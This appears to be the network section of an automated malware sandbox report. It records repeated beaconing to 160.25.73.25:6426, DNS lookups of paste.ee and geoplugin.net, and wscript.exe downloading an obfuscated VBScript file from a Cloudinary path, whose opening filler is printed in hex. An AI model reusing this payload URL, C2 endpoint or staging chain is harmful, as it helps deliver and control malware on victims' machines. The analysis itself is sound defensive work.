                                                                                                                                          Dec 14, 2024 14:00:52.873558044 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.874654055 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.874757051 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.874804974 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.876271963 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.876348972 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.876386881 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.877996922 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.878066063 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.878114939 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.879729033 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.879775047 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.879825115 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.881197929 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.881266117 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.881313086 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.882775068 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.882860899 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.882908106 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.884190083 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.884315968 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.884362936 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.885771036 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.885907888 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.885946989 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.887356997 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.887445927 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.887485981 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.889039040 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.889100075 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.889151096 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.890505075 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.890661955 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.890711069 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.892124891 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.892275095 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.892324924 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.893739939 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.893889904 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.893938065 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.895365000 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.895458937 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.895505905 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.896939039 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.897058010 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.897098064 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.898514986 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.898608923 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.898648024 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.900064945 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.900127888 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.900180101 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.901631117 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.901740074 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.901783943 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.903434992 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.903532028 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.903577089 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.904755116 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.904881954 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.904931068 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.906444073 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.906529903 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.906579018 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.907985926 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.908070087 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.908109903 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.909621954 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.909694910 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.909743071 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.911209106 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.911262035 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.911308050 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.912746906 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.912792921 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.912837029 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.914335012 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.914376020 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.914422035 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.915885925 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.916013002 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.916059017 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.917467117 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.917587042 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.917630911 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.919075966 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.919229984 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.919270039 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:54.195020914 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:54.315058947 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.315099001 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.315140963 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:54.315151930 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.315174103 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:54.315181017 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.315197945 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:54.315237999 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.315290928 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.315341949 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.315829992 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.316565990 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.316698074 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.435622931 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.435668945 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.435729027 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.435758114 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.435794115 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.435822964 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.436038971 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:54.436093092 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:01:15.643978119 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:01:15.696904898 CET497206426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:01:15.817044973 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:01:45.655976057 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:01:45.672616959 CET497206426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:01:45.793133974 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:02:15.659558058 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:02:15.661016941 CET497206426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:02:15.780986071 CET642649720160.25.73.25192.168.2.12

                                                                                                                                          UDP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Dec 14, 2024 14:00:12.352983952 CET5679453192.168.2.121.1.1.1
                                                                                                                                          Dec 14, 2024 14:00:12.490973949 CET53567941.1.1.1192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:40.965120077 CET5142953192.168.2.121.1.1.1
                                                                                                                                          Dec 14, 2024 14:00:41.106004953 CET53514291.1.1.1192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:47.654666901 CET6215053192.168.2.121.1.1.1
                                                                                                                                          Dec 14, 2024 14:00:47.886625051 CET53621501.1.1.1192.168.2.12

                                                                                                                                          DNS Queries

                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Dec 14, 2024 14:00:12.352983952 CET192.168.2.121.1.1.10xba3aStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                                          Dec 14, 2024 14:00:40.965120077 CET192.168.2.121.1.1.10x4d14Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                                          Dec 14, 2024 14:00:47.654666901 CET192.168.2.121.1.1.10xc372Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                                          DNS Answers

                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Dec 14, 2024 14:00:12.490973949 CET1.1.1.1192.168.2.120xba3aNo error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Dec 14, 2024 14:00:12.490973949 CET1.1.1.1192.168.2.120xba3aNo error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                                                                          Dec 14, 2024 14:00:12.490973949 CET1.1.1.1192.168.2.120xba3aNo error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                                                                          Dec 14, 2024 14:00:12.490973949 CET1.1.1.1192.168.2.120xba3aNo error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                                                                          Dec 14, 2024 14:00:12.490973949 CET1.1.1.1192.168.2.120xba3aNo error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                                                                          Dec 14, 2024 14:00:31.823565960 CET1.1.1.1192.168.2.120x72d4No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Dec 14, 2024 14:00:31.823565960 CET1.1.1.1192.168.2.120x72d4No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                          Dec 14, 2024 14:00:34.982331038 CET1.1.1.1192.168.2.120x93fbNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                          Dec 14, 2024 14:00:34.982331038 CET1.1.1.1192.168.2.120x93fbNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                          Dec 14, 2024 14:00:41.106004953 CET1.1.1.1192.168.2.120x4d14No error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                                                                                          Dec 14, 2024 14:00:41.106004953 CET1.1.1.1192.168.2.120x4d14No error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                                                                                          Dec 14, 2024 14:00:47.886625051 CET1.1.1.1192.168.2.120xc372No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                          Dec 14, 2024 14:01:58.457505941 CET1.1.1.1192.168.2.120x8718No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Dec 14, 2024 14:01:58.457505941 CET1.1.1.1192.168.2.120x8718No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false

                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                          • res.cloudinary.com
                                                                                                                                          • paste.ee
                                                                                                                                          • geoplugin.net

                                                                                                                                          HTTP Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.1249722178.237.33.50807040C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 14, 2024 14:00:48.013647079 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                          Host: geoplugin.net
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Dec 14, 2024 14:00:49.266374111 CET1171INHTTP/1.1 200 OK
                                                                                                                                          date: Sat, 14 Dec 2024 13:00:49 GMT
                                                                                                                                          server: Apache
                                                                                                                                          content-length: 963
                                                                                                                                          content-type: application/json; charset=utf-8
                                                                                                                                          cache-control: public, max-age=300
                                                                                                                                          access-control-allow-origin: *
                                                                                                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                                                          Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.1249710151.101.193.1374436884C:\Windows\System32\wscript.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-14 13:00:14 UTC372OUTGET /dzakc3wag/raw/upload/v1734112417/uploaded_textfile HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-ch
                                                                                                                                          UA-CPU: AMD64
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                          Host: res.cloudinary.com
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2024-12-14 13:00:14 UTC776INHTTP/1.1 200 OK
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 157299
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Content-Disposition: attachment; filename="uploaded_textfile"
                                                                                                                                          Etag: "e39538cf60c1a9768333bf00e0262702"
                                                                                                                                          Last-Modified: Fri, 13 Dec 2024 17:53:38 GMT
                                                                                                                                          Date: Sat, 14 Dec 2024 13:00:14 GMT
                                                                                                                                          Strict-Transport-Security: max-age=604800
                                                                                                                                          Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                                                                          Server-Timing: cld-fastly;dur=230;cpu=119;start=2024-12-14T13:00:14.316Z;desc=miss,rtt;dur=169,cloudinary;dur=101;start=2024-12-14T13:00:14.439Z
                                                                                                                                          Server: Cloudinary
                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing
                                                                                                                                          x-request-id: 09309909e85cdcf78096ba77219125ea
                                                                                                                                          2024-12-14 13:00:14 UTC1378INData Raw: 71 69 57 47 4e 47 4e 66 57 75 78 69 62 42 57 20 3d 20 22 4b 4e 75 6b 47 55 42 5a 43 4c 4c 63 42 4a 61 22 0d 0a 4b 4c 6b 4f 6b 4f 75 47 68 6a 78 6d 4c 7a 7a 20 3d 20 22 63 6e 66 4c 75 76 63 57 57 75 66 69 4b 42 49 22 0d 0a 4c 57 4c 4e 62 6b 65 6d 55 57 67 41 75 43 4c 20 3d 20 22 4c 6c 64 4b 65 78 55 6c 6d 4c 49 65 6d 78 70 22 0d 0a 75 67 63 68 67 4b 61 42 51 4c 70 6d 63 69 4b 20 3d 20 22 4f 6f 4f 47 4b 4c 47 57 4c 4e 4c 55 41 6b 53 22 0d 0a 69 4c 68 62 54 61 4c 4c 67 6c 64 66 6f 57 48 20 3d 20 22 54 6d 4b 6e 4e 4a 68 55 6e 69 61 57 6e 69 4e 22 0d 0a 75 62 76 70 4c 69 57 4c 41 6b 65 41 64 68 63 20 3d 20 22 6b 65 4c 57 4a 63 4b 66 50 6c 42 69 4b 4c 7a 22 0d 0a 50 61 52 68 66 4e 6c 50 64 69 69 4e 51 6c 57 20 3d 20 22 69 43 49 6c 53 7a 57 41 6b 6e 51 47 4e 69
                                                                                                                                          Data Ascii: qiWGNGNfWuxibBW = "KNukGUBZCLLcBJa"KLkOkOuGhjxmLzz = "cnfLuvcWWufiKBI"LWLNbkemUWgAuCL = "LldKexUlmLIemxp"ugchgKaBQLpmciK = "OoOGKLGWLNLUAkS"iLhbTaLLgldfoWH = "TmKnNJhUniaWniN"ubvpLiWLAkeAdhc = "keLWJcKfPlBiKLz"PaRhfNlPdiiNQlW = "iCIlSzWAknQGNi
                                                                                                                                          2024-12-14 13:00:14 UTC1378INData Raw: 47 4c 69 64 69 62 4b 73 47 64 68 7a 20 3d 20 22 4f 75 55 69 47 74 64 5a 6b 65 7a 66 4a 4a 41 22 0d 0a 6a 4c 52 69 68 55 76 74 6b 5a 57 69 50 48 6d 20 3d 20 22 64 5a 5a 50 52 57 54 4e 57 55 4c 4e 4c 55 6e 22 0d 0a 52 57 62 63 4c 71 6e 63 5a 63 6a 69 57 6f 55 20 3d 20 22 53 70 57 5a 65 78 6b 50 6a 72 61 4e 69 50 5a 22 0d 0a 4c 4e 65 63 4c 69 62 57 5a 57 6b 70 57 67 4b 20 3d 20 22 66 57 64 4c 69 69 55 4a 71 42 68 43 62 55 4c 22 0d 0a 4c 62 4c 71 52 63 71 69 4e 4b 69 71 62 57 74 20 3d 20 22 5a 43 73 42 66 6c 70 70 50 6d 5a 41 71 4c 78 22 0d 0a 43 7a 57 55 61 4c 6d 57 70 61 4b 74 6d 75 57 20 3d 20 22 6d 4c 41 75 6c 57 57 4c 75 76 62 69 51 7a 70 22 0d 0a 4a 57 57 47 76 63 68 63 68 66 63 71 4c 78 64 20 3d 20 22 4c 75 70 50 48 57 55 6b 5a 71 78 4c 47 41 57 22 0d
                                                                                                                                          Data Ascii: GLidibKsGdhz = "OuUiGtdZkezfJJA"jLRihUvtkZWiPHm = "dZZPRWTNWULNLUn"RWbcLqncZcjiWoU = "SpWZexkPjraNiPZ"LNecLibWZWkpWgK = "fWdLiiUJqBhCbUL"LbLqRcqiNKiqbWt = "ZCsBflppPmZAqLx"CzWUaLmWpaKtmuW = "mLAulWWLuvbiQzp"JWWGvchchfcqLxd = "LupPHWUkZqxLGAW"
                                                                                                                                          2024-12-14 13:00:14 UTC1378INData Raw: 65 62 4b 6c 57 64 4b 6d 47 20 3d 20 22 4c 47 66 5a 69 4c 4c 52 67 6f 47 4e 69 62 78 22 0d 0a 68 6b 4b 4a 55 4c 63 69 6b 70 4b 69 5a 6d 42 20 3d 20 22 63 4b 50 4a 6e 54 76 4c 73 57 6c 4b 57 64 4c 22 0d 0a 53 47 68 65 61 69 65 74 4b 50 6d 55 55 63 6b 20 3d 20 22 57 70 63 75 5a 43 67 68 42 65 4c 43 54 57 51 22 0d 0a 65 4c 50 6f 5a 4f 6b 57 65 4c 70 51 69 78 75 20 3d 20 22 69 76 69 64 63 6f 65 57 63 4c 41 51 6b 65 47 22 0d 0a 53 6b 68 4c 64 4f 78 66 42 65 4c 63 69 64 4b 20 3d 20 22 68 68 69 6b 57 65 57 6d 4c 66 4c 6c 5a 6f 47 22 0d 0a 47 64 6d 64 4c 69 50 63 65 4e 4b 43 65 50 67 20 3d 20 22 52 75 5a 75 74 6b 6e 4c 71 4e 68 70 71 4e 61 22 0d 0a 0d 0a 57 6b 6d 42 4c 4c 53 69 42 6b 4c 6c 43 4e 64 20 3d 20 22 72 6d 4c 57 6b 61 57 6f 70 50 7a 4e 49 6b 4c 22 0d 0a
                                                                                                                                          Data Ascii: ebKlWdKmG = "LGfZiLLRgoGNibx"hkKJULcikpKiZmB = "cKPJnTvLsWlKWdL"SGheaietKPmUUck = "WpcuZCghBeLCTWQ"eLPoZOkWeLpQixu = "ividcoeWcLAQkeG"SkhLdOxfBeLcidK = "hhikWeWmLfLlZoG"GdmdLiPceNKCePg = "RuZutknLqNhpqNa"WkmBLLSiBkLlCNd = "rmLWkaWopPzNIkL"
                                                                                                                                          2024-12-14 13:00:14 UTC1378INData Raw: 6b 65 4c 65 47 6f 73 54 20 3d 20 22 52 71 57 61 4b 78 6f 64 6e 6b 5a 6f 7a 78 68 22 0d 0a 41 4c 61 57 47 4c 63 6d 74 41 47 47 72 4c 50 20 3d 20 22 5a 62 6a 69 73 66 69 57 4b 71 6a 57 57 66 6b 22 0d 0a 4b 62 57 47 51 6b 4b 47 4c 4c 68 6d 47 57 52 20 3d 20 22 78 5a 63 57 4f 65 7a 57 6d 7a 62 4c 70 61 76 22 0d 0a 65 57 55 66 6b 6f 61 57 47 42 4c 4c 72 48 42 20 3d 20 22 7a 6c 64 52 4b 54 63 6b 41 41 76 6b 47 47 69 22 0d 0a 6f 61 6d 50 50 62 63 55 6b 6d 65 4b 67 4c 4b 20 3d 20 22 6e 47 42 6c 42 55 55 66 63 65 47 4f 6e 4c 65 22 0d 0a 53 57 61 4e 4b 65 41 72 73 4b 64 65 66 69 51 20 3d 20 22 57 63 5a 4c 6f 68 4b 4b 54 78 57 74 72 47 66 22 0d 0a 57 7a 6b 4f 6f 68 41 55 57 69 61 7a 6b 78 66 20 3d 20 22 43 74 4f 54 4a 57 66 57 4c 41 62 48 69 4c 5a 22 0d 0a 41 4c 4b
                                                                                                                                          Data Ascii: keLeGosT = "RqWaKxodnkZozxh"ALaWGLcmtAGGrLP = "ZbjisfiWKqjWWfk"KbWGQkKGLLhmGWR = "xZcWOezWmzbLpav"eWUfkoaWGBLLrHB = "zldRKTckAAvkGGi"oamPPbcUkmeKgLK = "nGBlBUUfceGOnLe"SWaNKeArsKdefiQ = "WcZLohKKTxWtrGf"WzkOohAUWiazkxf = "CtOTJWfWLAbHiLZ"ALK
                                                                                                                                          2024-12-14 13:00:14 UTC1378INData Raw: 6c 61 63 68 41 20 3d 20 22 66 70 5a 6d 50 4c 69 4c 57 72 41 57 69 47 62 22 0d 0a 69 73 69 54 75 5a 4c 4c 7a 53 4a 41 57 4e 57 20 3d 20 22 6d 65 6d 4b 57 4c 69 57 5a 6e 47 57 57 47 4f 22 0d 0a 0d 0a 61 63 50 4f 74 57 65 50 4c 4c 41 4c 4c 69 5a 20 3d 20 22 69 41 57 41 4c 74 50 6e 63 6a 65 66 4f 7a 71 22 0d 0a 64 4c 4b 5a 6b 55 4a 49 50 66 4b 4b 70 65 4c 20 3d 20 22 43 47 48 42 54 50 63 6c 48 4e 75 66 7a 4c 41 22 0d 0a 4b 6b 4c 6b 73 73 4c 6c 69 57 63 62 53 55 6a 20 3d 20 22 55 6e 61 57 4c 63 4c 6d 6b 4f 6b 68 52 4c 4b 22 0d 0a 5a 42 4c 51 68 62 54 4c 4c 50 57 68 69 63 5a 20 3d 20 22 41 57 69 47 62 6f 7a 4c 67 52 75 65 4e 70 68 22 0d 0a 4c 55 57 6d 4c 4c 4e 41 49 63 4c 6c 6d 4e 6c 20 3d 20 22 57 70 7a 41 6b 57 70 4f 4c 70 5a 42 73 4c 55 22 0d 0a 4c 6c 6a 57
                                                                                                                                          Data Ascii: lachA = "fpZmPLiLWrAWiGb"isiTuZLLzSJAWNW = "memKWLiWZnGWWGO"acPOtWePLLALLiZ = "iAWALtPncjefOzq"dLKZkUJIPfKKpeL = "CGHBTPclHNufzLA"KkLkssLliWcbSUj = "UnaWLcLmkOkhRLK"ZBLQhbTLLPWhicZ = "AWiGbozLgRueNph"LUWmLLNAIcLlmNl = "WpzAkWpOLpZBsLU"LljW
